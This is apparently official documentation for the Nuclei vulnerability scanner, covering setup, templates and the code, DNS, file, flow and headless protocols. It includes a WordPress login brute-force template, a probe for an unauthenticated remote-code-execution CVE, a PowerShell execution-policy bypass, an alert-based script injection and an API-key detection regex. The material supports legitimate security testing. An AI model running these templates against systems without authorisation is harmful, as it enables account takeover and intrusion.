This section will guide you through the quickest way to install, set up, and run a scan using some key ProjectDiscovery open-source tools.
We’ll focus on a few tools to demonstrate ProjectDiscovery’s core capabilities. If you want to explore more tools and features, don’t hesitate to [reach out](/help).
Interested in learning more about the **ProjectDiscovery Cloud Platform (PDCP)**? Visit the [PDCP Introduction](/cloud/introduction) for all the details.
## What's in Getting Started?
Get started with ProjectDiscovery in a few simple steps:
* Installing the latest version of Go
* Installing Nuclei
* Running a scan
* Reviewing your results
Download and install the latest version of Go from the official website. Ensure that your system is up to date and Go is properly installed by running `go version` in your terminal.
Install Nuclei by following the instructions in the official [Nuclei documentation](https://docs.projectdiscovery.io/tools/nuclei/install/). You can use package managers or build from source.
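For example, with Go installed, the latest release can be fetched directly via `go install` (this is the standard install command from the Nuclei README):
```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```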
After installing Nuclei, run your first scan with the command:
```bash
nuclei -u https://your-target-domain.com
```
This will initiate a scan on the target domain.
Once the scan is complete, review the results to identify any potential vulnerabilities. Nuclei will generate a report of findings that you can act on.
**Next Steps**
Follow the links below to explore ProjectDiscovery further.
**Check out the example**
* [View the example](https://drive.google.com/file/d/1hdQpnferNOnUji20GHG7KBkJkGBY7u5w/view)
* [Download the PDF](https://drive.google.com/uc?export=download\&id=1hdQpnferNOnUji20GHG7KBkJkGBY7u5w)
# Getting Help
Review your options for getting help from ProjectDiscovery
Need assistance or guidance? You're in the right place, and we're here to help!
# ProjectDiscovery - Platform to Monitor Infrastructure
Learn how to get up and running with ProjectDiscovery through guides, tutorials and platform resources.
## What is ProjectDiscovery?
**[ProjectDiscovery](https://projectdiscovery.io/)** is an open-source security company focused on detecting **new, exploitable vulnerabilities** and **misconfigurations**, so you can remediate them before hackers take advantage.
Our community-driven tools empower you with actionable insights to stay ahead of threats in real time.
Try [ProjectDiscovery Cloud Platform](https://cloud.projectdiscovery.io/) today for Free.
## Get Started
From open source tools to our ProjectDiscovery Cloud Platform (PDCP), explore solutions for automation, integration, and continuous scanning to defend your modern tech stack against exploitable vulnerabilities.
Watch the video below for a quick overview of our documentation.
## Get to know us
* Protect your attack surface at scale with a fast cloud-hosted solution featuring integrations, collaboration, and more.
* Dive into our open source tools for asset discovery & exploitable vulnerability detection.
* Our tools are open source and built by our entire community - and that could include you!
* The ProjectDiscovery community is a space for security engineers and developers to learn how to manage vulnerability workflows faster and better.
Visit [What is ProjectDiscovery?](/overview) to learn more about who we are and what we build.
# What is ProjectDiscovery?
Learn about ProjectDiscovery, who we are, and the solutions we offer
## Who are we?
> We're ProjectDiscovery. We make dozens of tools for individual bug bounty hunters, pentesters, and AppSec professionals. Through the power of open source and
> our community we build powerful customizable solutions to secure your attack surface against a continuously evolving landscape of threats
> and vulnerabilities.
## Open Source Tools
1. [**Discover**](/tools/index#discover) - Identify assets and broaden your visibility of the attack surface.
2. [**Enrich**](/tools/index#enrich) - Understand the technologies and services exposed to the internet.
3. [**Detect**](/tools/index#detect) - Pinpoint exploitable vulnerabilities within the attack surface.
## ProjectDiscovery Cloud Platform
[ProjectDiscovery Cloud Platform](https://projectdiscovery.io/platform) (PDCP) is a cloud-hosted security platform designed to provide continuous visibility across your external attack surface by detecting exploitable vulnerabilities and misconfigurations.
It is built to solve a variety of use cases, and scale to support the key workflows application security teams need to secure their infrastructure.
Visit [the ProjectDiscovery Cloud Platform](/cloud/introduction) section of our documentation to learn more.
# Templates FAQ
Some common questions and answers about Nuclei templates
For info on the Nuclei Template Editor or using templates with ProjectDiscovery Cloud Platform - [learn more here](/cloud/editor/overview).
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project. The templates contain the actual logic that is executed in order to detect various vulnerabilities. The project consists of **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates.
We maintain a [template guide](/templates/introduction/) for writing new and custom Nuclei templates.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease. It's worth mentioning **you write the template once and use it forever**, as you don't need to manually test that specific vulnerability any longer.
Here are a few examples from the community making use of templates to automate security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
Nuclei templates can be executed using a template name or with tags, using the `-templates` (`-t`) and `-tags` flags, respectively.
```bash
nuclei -tags cve -list target_urls.txt
```
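Templates can likewise be run by path with `-t`; a sketch (the template path shown is illustrative):
```bash
# run a single template against one target
nuclei -t http/technologies/tech-detect.yaml -u https://example.com
```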
You are always welcome to share your templates with the community. You can either open a [GitHub issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=nuclei-template\&template=submit-template.md\&title=%5Bnuclei-template%5D+template-name) with the template details or open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your nuclei templates. If you don't have a GitHub account, you can also make use of the [discord server](https://discord.gg/projectdiscovery) to share the template with us.
The Nuclei template project is a **community-contributed project**. The ProjectDiscovery team manually reviews templates before merging them into the project. Still, there is a possibility that some templates with weak matchers will slip through the verification. This could produce false-positive results. **Templates are only as good as their matchers.**
If you've identified templates producing false positive or false negative results, here are a few steps you can follow to fix them quickly:
1. Direct message us on [Twitter](https://twitter.com/pdnuclei) or [Discord](https://discord.gg/projectdiscovery) to confirm the validity of the template.
2. Open a GitHub [issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=false-positive\&template=false-positive.md\&title=%5Bfalse-positive%5D+template-name+) with details, and we will work to address the problem and update the template.
3. Open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with a fix.
The Nuclei templates project houses a variety of templates that perform fuzzing and other actions which may result in a DoS against the target system (see [the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)). To ensure these templates are not accidentally run, they are tagged and excluded from the default scan. These templates can only be executed when explicitly invoked using the `-itags` option.
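For example, a run that explicitly includes templates tagged as intrusive (the tags shown are illustrative entries from the ignore list):
```bash
nuclei -u https://example.com -itags dos,fuzz
```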
{" "}
When you download or update Nuclei templates using the Nuclei binary, it downloads all the templates from the latest **release**. All templates added after the release exist in the [master branch](https://github.com/projectdiscovery/nuclei-templates) and are added to Nuclei when a new template release is created.
# Introduction to Nuclei Templates
YAML-based universal language for describing exploitable vulnerabilities
For info on the Nuclei Template Editor or using templates with ProjectDiscovery Cloud Platform - [learn more here](/cloud/editor/overview).
## What are Nuclei Templates?
Nuclei templates are the cornerstone of the Nuclei scanning engine. Nuclei templates enable precise and rapid scanning across various protocols like TCP, DNS, HTTP, and more. They are designed to send targeted requests based on specific vulnerability checks, ensuring low-to-zero false positives and efficient scanning over large networks.
## YAML
Nuclei templates are `YAML`-based files that define how requests are sent and processed. This makes nuclei easily extensible. `YAML` provides a simple, human-readable format for quickly defining the execution process.
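For orientation, here is a minimal sketch of that shape: an `id`, an `info` block, and a protocol section describing the request to send and what to match on (all values are illustrative).
```yaml
id: example-template

info:
  name: Example Template
  author: you
  severity: info

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers:
      - type: word
        words:
          - "Example Domain"
```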
## Universal Language for Vulnerabilities
Nuclei Templates offer a streamlined way to identify and communicate vulnerabilities, combining essential details like severity ratings and detection methods. This open-source, community-developed tool accelerates threat response and is widely recognized in the cybersecurity world.
Learn more about nuclei templates as a universal language for exploitable vulnerabilities [on our blog](https://blog.projectdiscovery.io/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities/).
## Learn more
Let's dive into the world of Nuclei templates! Use the links on the left or those below to learn more.
* Learn what makes up the structure of a nuclei template
* Get started making simple HTTP requests with Nuclei
* Watch a video on writing your first nuclei template!
* Nuclei thrives on community contributions. Submit your templates to be used by security experts everywhere!
# Code Protocol
Learn about using external code with Nuclei
Nuclei enables the execution of external code on the host operating system. This feature allows security researchers, pentesters, and developers to extend the capabilities of Nuclei and perform complex actions beyond the scope of regular supported protocol-based testing.
By leveraging this capability, Nuclei can interact with the underlying operating system and execute custom scripts or commands, opening up a wide range of possibilities. It enables users to perform tasks such as system-level configurations, file operations, network interactions, and more. This level of control and flexibility empowers users to tailor their security testing workflows according to their specific requirements.
To write a code template, a `code` block is used to indicate the start of the requests for the template. This block marks the beginning of the code-related instructions.
```yaml
# Start the requests for the template right here
code:
```
## Engine
To execute the code, a list of language interpreters, which are installed or available in the system environment, is specified. These can include, but are not limited to, `bash`, `sh`, `py`, `python3`, `go`, and `ps`; they are searched sequentially until a suitable one is found. The identifiers for these interpreters should correspond to their respective names or identifiers recognized by the system environment.
```yaml
- engine:
- py
- python3
```
The code to be executed can be provided either as an external file or as a code snippet directly within the template.
For an external file:
```yaml
source: helpers/code/pyfile.py
```
For a code snippet:
```yaml
source: |
import sys
print("hello from " + sys.stdin.read())
```
The target is passed to the template via stdin, and the output of the executed code is available for further processing in matchers and extractors. In the case of the Code protocol, the response part represents all data printed to stdout during the execution of the code.
## Parts
Valid `part` values supported by the **Code** protocol for Matchers / Extractors are -
| Value    | Description                                        |
| -------- | -------------------------------------------------- |
| response | execution output (trailing whitespace is filtered) |
| stderr   | raw stderr output (if any)                         |
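For instance, a sketch of a matcher that flags interpreter failures by checking the `stderr` part (the matched word is illustrative):
```yaml
matchers:
  - type: word
    part: stderr
    words:
      - "Traceback"
```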
The example below demonstrates the execution of bash and python code snippets within a template. The specified engines are searched in the given order, and the code snippet is executed accordingly. Additionally, dynamic template variables are used in the code snippets and are replaced with their respective values during execution, which shows the flexibility and customization that can be achieved using this protocol.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
variables:
OAST: "{{interactsh-url}}"
code:
- engine:
- sh
- bash
source: |
echo "$OAST" | base64
- engine:
- py
- python3
source: |
import base64
import os
text = os.getenv('OAST')
text_bytes = text.encode('utf-8')
base64_bytes = base64.b64encode(text_bytes)
base64_text = base64_bytes.decode('utf-8')
print(base64_text)
http:
- method: GET
path:
- "{{BaseURL}}/?x={{code_1_response}}"
- "{{BaseURL}}/?x={{code_2_response}}"
# digest: 4a0a0047304502202ce8fe9f5992782da6ba59da4e8ebfde9f19a12e247adc507040e9f1f1124b4e022100cf0bc7a44a557a6655f79a2b4789e103f5099f0f81a8d1bc4ad8aabe7829b1c5:8eeeebe39b11b16384b45bc7e9163000
```
Apart from the required fields mentioned above, the Code protocol also supports the following optional fields to further customize the execution of code.
## Args
Args are arguments passed to the engine while executing the code. For example, if we want to bypass the execution policy in PowerShell for a specific template, this can be done by adding the following args to the template.
```yaml
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
```
## Pattern
The pattern field can be used to customize the name/extension of the temporary file created while executing a code snippet in a template.
```yaml
pattern: "*.ps1"
```
Adding `pattern: "*.ps1"` ensures that the temporary file's name matches the given pattern (in this case, a `.ps1` extension).
## Examples
This code example shows a basic response extracted using DSL.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
self-contained: true
code:
- engine:
- py
- python3
source: |
print("Hello World")
extractors:
- type: dsl
dsl:
- response
# digest: 4a0a0047304502204576db451ff35ea9a13c107b07a6d74f99fd9a78f5c2316cc3dece411e7d5a2b022100a36db96f2a56492147ca3e7de3c4d36b8e1361076a70924061790003958c4ef3:c40a3a04977cdbf9dca31c1002ea8279
```
Below is an example code template that executes a PowerShell script while customizing the execution policy behavior and setting the pattern to `*.ps1`.
```yaml
id: ps1-code-snippet
info:
name: ps1-code-snippet
author: pdteam
severity: info
description: |
ps1-code-snippet
tags: code
code:
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
pattern: "*.ps1"
source: |
$stdin = [Console]::In
$line = $stdin.ReadLine()
Write-Host "hello from $line"
matchers:
- type: word
words:
- "hello from input"
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
## Running Code Templates
By default, Nuclei will not execute code templates. To enable code protocol execution, the `-code` flag needs to be explicitly passed to nuclei.
```bash
nuclei -t code-template.yaml -code
```
## Learn More
For more examples, please refer to example [code-templates](https://github.com/projectdiscovery/nuclei/tree/main/integration_tests/protocols/code) in integration tests.
It's important to exercise caution while utilizing this feature, as executing external code on the host operating system carries inherent risks. It is crucial to ensure that the executed code is secure, thoroughly tested, and does not pose any unintended consequences or security risks to the target system.
To ensure the integrity of the code in your templates, be sure to sign your templates using the [Template Signing](/templates/reference/template-signing) methods.
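As a sketch, assuming you have generated a signing key pair as described on the template-signing page, a template can be signed in place with the nuclei binary's `-sign` flag:
```bash
# sign the template so the engine will trust and execute its code blocks
nuclei -t code-template.yaml -sign
```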
# DNS Protocol
Learn about using DNS with Nuclei
The DNS protocol can be modelled in Nuclei with ease. Fully customizable DNS requests can be sent by Nuclei to nameservers, and matching/extracting can be performed on their responses.
DNS Requests start with a **dns** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
dns:
```
### Type
The first thing in the request is the **type**. The request type can be **A**, **NS**, **CNAME**, **SOA**, **PTR**, **MX**, **TXT**, or **AAAA**.
```yaml
# type is the type for the dns request
type: A
```
### Name
The next part of the request is the DNS **name** to resolve. Dynamic variables can be placed in the name to modify its value at runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **FQDN** - this variable is replaced by the hostname/FQDN of the target at runtime.
An example name value:
```yaml
name: "{{FQDN}}.com"
# This value will be replaced on execution with the FQDN.
# If the FQDN of the target is this.is.an.example then the
# name will be replaced with: this.is.an.example.com
```
As of now the tool supports only one name per request.
### Class
Class type can be **INET**, **CSNET**, **CHAOS**, **HESIOD**, **NONE** and **ANY**. Usually it's enough to just leave it as **INET**.
```yaml
# class is the class for the dns request
class: inet
```
### Recursion
Recursion is a boolean value, and determines if the resolver should only return cached results, or traverse the whole dns root tree to retrieve fresh results. Generally it's better to leave it as **true**.
```yaml
# Recursion is a boolean determining if the request is recursive
recursion: true
```
### Retries
Retries is the number of attempts a DNS query is retried across different resolvers before giving up. A reasonable value, such as **3**, is recommended.
```yaml
# Retries is a number of retries before giving up on dns resolution
retries: 3
```
### Matchers / Extractor Parts
Valid `part` values supported by **DNS** protocol for Matchers / Extractor are -
| Value | Description |
| ---------------- | --------------------------- |
| request | DNS Request |
| rcode | DNS Rcode |
| question | DNS Question Message |
| extra | DNS Message Extra Field |
| answer | DNS Message Answer Field |
| ns | DNS Message Authority Field |
| raw / all / body | Raw DNS Message |
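For instance, a sketch of an extractor that pulls A records from the `answer` part (the regex is illustrative):
```yaml
extractors:
  - type: regex
    part: answer
    regex:
      - "IN\tA\t(.+)"
```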
### Example DNS Template
The final example template, which performs an `A` query and checks if CNAME and A records are present in the response, is as follows:
```yaml
id: dummy-cname-a
info:
name: Dummy A dns request
author: mzack9999
severity: info
description: Checks if CNAME and A record is returned.
dns:
- name: "{{FQDN}}"
type: A
class: inet
recursion: true
retries: 3
matchers:
- type: word
words:
# The response must contain a CNAME record
- "IN\tCNAME"
# and also at least 1 A record
- "IN\tA"
condition: and
```
More complete examples are provided [here](/templates/protocols/dns-examples).
# File Protocol
Learn about using Nuclei to work with the local file system
## Overview
Nuclei allows modelling templates that can match/extract on the local file system.
```yaml
# Start of file template block
file:
```
## Extensions
To match on all extensions (except those in the default denylist), use the following -
```yaml
extensions:
- all
```
You can also provide a list of custom extensions that should be matched upon.
```yaml
extensions:
- py
- go
```
A denylist of extensions can also be provided. Files with these extensions will not be processed by nuclei.
```yaml
extensions:
- all
denylist:
- go
- py
- txt
```
By default, certain extensions are excluded in the nuclei file module. A list of these is provided below -
```
3g2,3gp,7z,apk,arj,avi,axd,bmp,css,csv,deb,dll,doc,drv,eot,exe,
flv,gif,gifv,gz,h264,ico,iso,jar,jpeg,jpg,lock,m4a,m4v,map,mkv,
mov,mp3,mp4,mpeg,mpg,msi,ogg,ogm,ogv,otf,pdf,pkg,png,ppt,psd,rar,
rm,rpm,svg,swf,sys,tar,tar.gz,tif,tiff,ttf,txt,vob,wav,webm,wmv,
woff,woff2,xcf,xls,xlsx,zip
```
## More Options
The **max-size** parameter limits the maximum size (in bytes) of files read by the nuclei engine.
By default, `max-size` is 5 MB (5242880 bytes); files larger than this will not be processed.
***
The **no-recursive** option disables recursive walking of directories/globs while input is being processed for the file module of nuclei.
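A sketch combining both options with a custom size cap (values are illustrative):
```yaml
file:
  - extensions:
      - all
    max-size: 2097152 # skip files larger than 2 MB (value in bytes)
    no-recursive: true # do not walk into subdirectories
```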
## Matchers / Extractors
The **File** protocol supports 2 types of Matchers -

| Matcher Type | Part Matched |
| ------------ | ------------ |
| word         | all          |
| regex        | all          |

| Extractor Type | Part Matched |
| -------------- | ------------ |
| word           | all          |
| regex          | all          |
## Example File Template
The final example template file, for Google API key detection, is provided below.
```yaml
id: google-api-key
info:
name: Google API Key
author: pdteam
severity: info
file:
- extensions:
- all
- txt
extractors:
- type: regex
name: google-api-key
regex:
- "AIza[0-9A-Za-z\\-_]{35}"
```
```bash
# Running file template on http-response/ directory
nuclei -t file.yaml -target http-response/
# Running file template on output.txt
nuclei -t file.yaml -target output.txt
```
More complete examples are provided [here](/templates/protocols/file-examples).
# Flow Protocol
Learn about the template flow engine in Nuclei v3
## Overview
The template flow engine was introduced in nuclei v3, and brings two significant enhancements to Nuclei:
* The ability to [conditionally execute requests](#conditional-execution)
* The [orchestration of request execution](#request-execution-orchestration)
These features are implemented using JavaScript (ECMAScript 5.1) via the [goja](https://github.com/dop251/goja) backend.
## Conditional Execution
Many times when writing complex templates, we might need to add some extra checks (or conditional statements) before executing certain parts of the request.
An ideal example of this would be [bruteforcing a WordPress login](https://cloud.projectdiscovery.io/public/wordpress-weak-credentials) with default usernames and passwords. If we carefully re-evaluate this template, we can see that it sends 276 requests without even checking whether the URL actually exists or the target site is actually a WordPress site.
With the addition of flow in Nuclei v3, we can rewrite this template to first check whether the target is a WordPress site and, if so, bruteforce the login with default credentials. This can be achieved by simply adding one line, i.e. `flow: http(1) && http(2)`, and nuclei will take care of everything else.
```yaml
id: wordpress-bruteforce
info:
name: WordPress Login Bruteforce
author: pdteam
severity: high
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
matchers:
- type: word
words:
- "WordPress"
- method: POST
path:
- "{{BaseURL}}/wp-login.php"
body: |
log={{username}}&pwd={{password}}&wp-submit=Log+In
attack: clusterbomb
payloads:
users: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
matchers:
- type: dsl
dsl:
- status_code == 302
- contains_all(header, "/wp-admin","wordpress_logged_in")
condition: and
```
The updated template is now straightforward and easy to understand: we first check whether the target is a WordPress site and then execute the bruteforce requests. This is just a simple example of conditional execution; `flow` accepts any JavaScript (ECMAScript 5.1) expression/code, so you are free to craft any conditional execution logic you want.
## Request Execution Orchestration
Flow is a powerful Nuclei feature that provides enhanced orchestration capabilities for executing requests. The simplicity of conditional execution is just the beginning. With flow, you can:
* Iterate over a list of values and execute a request for each one
* Extract values from a request, iterate over them, and perform another request for each
* Get and set values within the template context (global variables)
* Write output to stdout for debugging purposes or based on specific conditions
* Introduce custom logic during template execution
* Use ECMAScript 5.1 JavaScript features to build and modify variables at runtime
* Update variables at runtime and use them in subsequent requests.
Think of request execution orchestration as a bridge between JavaScript and Nuclei, offering two-way interaction within a specific template.
**Practical Example: Vhost Enumeration**
To better illustrate the power of flow, let's consider developing a template for vhost (virtual host) enumeration. This set of tasks typically requires writing a new tool from scratch. Here are the steps we need to follow:
1. Retrieve the SSL certificate for the provided IP (using tlsx)
* Extract `subject_cn` (CN) from the certificate
* Extract `subject_an` (SAN) from the certificate
* Remove wildcard prefixes from the values obtained in the steps above
2. Bruteforce the request using all the domains found from the SSL request
You can utilize flow to simplify this task. The JavaScript code below orchestrates the vhost enumeration:
```javascript
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
```
In this code, we've introduced 5 extra lines of JavaScript. This allows the template to perform vhost enumeration. The best part? You can run this at scale with all the features of Nuclei, using supported inputs like ASN, CIDR, and URL.
Let's break down the JavaScript code:
1. `ssl()`: This function executes the SSL request.
2. `template["ssl_domains"]`: Retrieves the value of `ssl_domains` from the template context.
3. `iterate()`: Helper function that iterates over any value type while handling empty or null values.
4. `set("vhost", vhost)`: Creates a new variable `vhost` in the template and assigns the `vhost` variable's value to it.
5. `http()`: This function conducts the HTTP request.
By understanding and taking advantage of Nuclei's `flow`, you can redefine the way you orchestrate request executions, making your templates much more powerful and efficient.
Here is a working template for vhost enumeration using flow:
```yaml
id: vhost-enum-flow
info:
name: vhost enum flow
author: tarunKoyalwar
severity: info
description: |
vhost enumeration by extracting potential vhost names from ssl certificate.
flow: |
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
ssl:
- address: "{{Host}}:{{Port}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{vhost}}
matchers:
- type: dsl
dsl:
- status_code != 400
- status_code != 502
extractors:
- type: dsl
dsl:
- '"VHOST: " + vhost + ", SC: " + status_code + ", CL: " + content_length'
```
## JS Bindings
This section contains a brief description of all nuclei JS bindings and their usage.
### Protocol Execution Function
In nuclei, any listed protocol can be invoked or executed in JavaScript using the `protocol_name()` format. For example, you can use `http()`, `dns()`, `ssl()`, etc.
If you want to execute a specific request of a protocol (refer to nuclei-flow-dns for an example), it can be achieved by passing either:
* The index of that request in the protocol (e.g.,`dns(1)`, `dns(2)`)
* The ID of that request in the protocol (e.g., `dns("extract-vps")`, `http("probe-http")`)
For more advanced scenarios where multiple requests of a single protocol need to be executed, you can specify their index or ID one after the other (e.g., `dns("extract-vps","1")`).
This flexibility in using either index numbers or ID strings to call specific protocol requests provides control for tailored execution, allowing you to build more complex and efficient workflows.
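A minimal sketch of calling requests by ID from `flow` (the `id` values and requests are illustrative):
```yaml
id: flow-by-request-id

info:
  name: flow by request id
  author: pdteam
  severity: info

flow: |
  dns("resolve-host") && http("probe-http")

dns:
  - id: resolve-host
    name: "{{FQDN}}"
    type: A

http:
  - id: probe-http
    method: GET
    path:
      - "{{BaseURL}}"
```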
### Iterate Helper Function
Iterate is a nuclei JS helper function that can be used to iterate over any type of value, like **array**, **map**, **string**, or **number**, while handling empty/nil values.
This add-on helper function from nuclei omits the boilerplate code of checking whether a value is empty and then iterating over it.
```javascript
iterate(123,{"a":1,"b":2,"c":3})
// iterate over array with custom separator
iterate([1,2,3,4,5], " ")
```
### Set Helper Function
When iterating over values/arrays, or in some other use cases, we might want to invoke a request with a custom/given value. This can be achieved using the `set()` helper function. When invoked/called, it adds the given variable to the template context (global variables), and that value is used during execution of the request/protocol. The format of `set()` is `set("variable_name", value)`, e.g. `set("username", "admin")`.
```javascript
for (let vhost of myArray) {
set("vhost", vhost);
http(1)
}
```
**Note:** In the above example we used `set("vhost", vhost)`, which added `vhost` to the template context (global variables), and then called `http(1)`, which used this value in the request.
### Template Context
A template context is a map containing all template data along with internal/unexported data that is only available at runtime (e.g., extracted values from previous requests, variables added using `set()`, etc.). This template context is available in JavaScript as the `template` variable and can be used to access any data from it, e.g. `template["dns_cname"]`, `template["ssl_subject_cn"]`.
```javascript
template["ssl_domains"] // returns value of ssl_domains from template context which is available after executing ssl request
template["ptrValue"] // returns value of ptrValue which was extracted using regex with internal: true
```
A lot of the time we don't know what data is available in the template context; this can easily be found by printing it to stdout using the `log()` function:
```javascript
log(template)
```
### Log Helper Function
It is a nuclei JS alternative to `console.log` that pretty-prints map data in a readable format.
**Note:** This should be used for debugging purposes only, as it prints data to stdout.
### Dedupe
Often, just having arrays/slices is not enough; we might need to remove duplicate values. For example, in the earlier vhost enumeration we did not remove any duplicates, even though there is always a chance of duplicate values in `ssl_subject_cn` and `ssl_subject_an`. This can be achieved using the `Dedupe` object, a nuclei JS helper that abstracts away the boilerplate code of removing duplicates from an array/slice.
```javascript
let uniq = new Dedupe(); // create new dedupe object
uniq.Add(template["ptrValue"])
uniq.Add(template["ssl_subject_cn"]);
uniq.Add(template["ssl_subject_an"]);
log(uniq.Values())
```
And that's it! This automatically converts any slice/array to a map, removes duplicates, and returns a slice/array of unique values.
> Similar to DSL helper functions, we can either use the built-in functions available with JavaScript (ECMAScript 5.1) or use DSL helper functions; it's up to the user to decide which to use.
### Skip Internal Matchers in MultiProtocol / Flow Templates
Before nuclei v3.1.4, a template like [`CVE-2023-43177`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-43177.yaml#L28), which has multiple requests/protocols and uses `flow` for logic, used to return only one result, but this conflicted with the logic when a `for` loop was used in `flow`. To fix this, the nuclei engine from v3.1.4 onwards prints all events/results in a template, and template writers can use `internal: true` in matchers to skip printing of events/results, just like dynamic extractors.
Note: this is only relevant if matchers/extractors are used in previous requests/protocols.
An example of [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21) with the new `internal: true` logic would be:
```yaml
id: CVE-2023-6553
info:
name: WordPress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
# Headless Protocol
Learn about using a headless browser with Nuclei
Nuclei supports automation of a browser with a simple DSL. The headless browser engine can be fully customized and user actions can be scripted, allowing complete control over the browser. This allows for a variety of unique and custom workflows.
```yaml
# Start the requests for the template right here
headless:
```
## Actions
An action is a single task for the Nuclei headless engine. Each action manipulates the browser state in some way, and finally leads to the state we are interested in capturing.
Nuclei supports a variety of actions. A list of these actions, along with their arguments, is given below:
### navigate
Navigate visits a given URL. The `url` field supports variables like `{{BaseURL}}` and `{{Hostname}}` to customize the request fully.
```yaml
action: navigate
args:
url: "{{BaseURL}}
```
### script
Script runs a JS code on the current browser page. At the simplest level, you can just provide a `code` argument with the JS snippet you want to execute, and it will be run on the page.
```yaml
action: script
args:
code: alert(document.domain)
```
Suppose you want to run a matcher on a JS object to inspect its value. These types of data-extraction use cases are also supported with nuclei headless. As an example, let's say the application sets an object called `window.random-object` with a value, and you want to match on that value.
```yaml
- action: script
args:
code: window.random-object
name: script-name
...
matchers:
- type: word
part: script-name
words:
- "some-value"
```
Nuclei supports running custom JavaScript before the page loads with the `hook` argument. The provided JavaScript will always run before any of the pages load.
The example below hooks `window.alert` so that alerts generated by the application do not stop the crawler.
```yaml
- action: script
args:
code: (function() { window.alert=function(){} })()
hook: true
```
This is one use case; there are many more uses of function hooking, such as DOM XSS detection and JavaScript-injection-based testing techniques. Further examples are provided on the examples page.
### click
Click simulates clicking with the Left-Mouse button on an element specified by a selector.
```yaml
action: click
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
Nuclei supports a variety of selector types, including but not limited to XPath, Regex, CSS, etc. For more information about selectors, see [here](#selectors).
### rightclick
RightClick simulates clicking with the Right-Mouse button on an element specified by a selector.
```yaml
action: rightclick
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### text
Text simulates typing something into an input with Keyboard. Selectors can be used to specify the element to type in.
```yaml
action: text
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: username
```
### screenshot
Screenshot takes a screenshot of a page and writes it to disk. It supports both full-page and normal screenshots.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
```
If you require a full-page screenshot, it can be achieved with the `fullpage: true` option in the args.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
fullpage: true
```
### time
Time enters values into time inputs on pages in RFC3339 format.
```yaml
action: time
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: 2006-01-02T15:04:05Z07:00
```
### select
Select performs selection on an HTML Input by a selector.
```yaml
action: select
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
selected: true
value: option[value=two]
selector: regex
```
### files
Files handles a file upload input on the webpage.
```yaml
action: files
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: /root/test/payload.txt
```
### waitfcp
WaitFCP waits for the first piece of meaningful content, such as text or an image, indicating that the page is becoming useful.
```yaml
action: waitfcp
